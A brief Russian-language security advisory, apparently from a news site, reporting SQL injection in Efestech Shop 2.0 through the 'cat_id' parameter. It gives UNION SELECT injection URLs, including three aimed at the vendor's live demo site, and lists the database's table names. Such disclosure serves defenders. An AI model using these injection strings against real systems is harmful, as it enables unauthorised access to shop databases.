Программа: Efestech Shop 2.0

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных в параметре «cat_id». Удаленный пользователь может с
помощью специально сформированного запроса выполнить произвольные SQL команды в
базе данных приложения.

Пример:

http://target.com/path/?cmd=urunler&cat_id=30+union+select+0+from+ayarlar

Таблицы:

ayarlar
cat_eng
cat_tr
eng
lisans
mark_eng
mark_tr
product
subcat_eng
subcat_tr
tr
urun_resim

http://www.efestech.com/demo/shop/?cmd=urunler&cat_id=
30+union+select+0+from+ayarlar
http://www.efestech.com/demo/shop/?cmd=urunler&cat_id=
30+union+select+0+from+eng
http://www.efestech.com/demo/shop/?cmd=urunler&cat_id= 30+union+select+0+from+tr

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

    • Открыть комментарии
    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии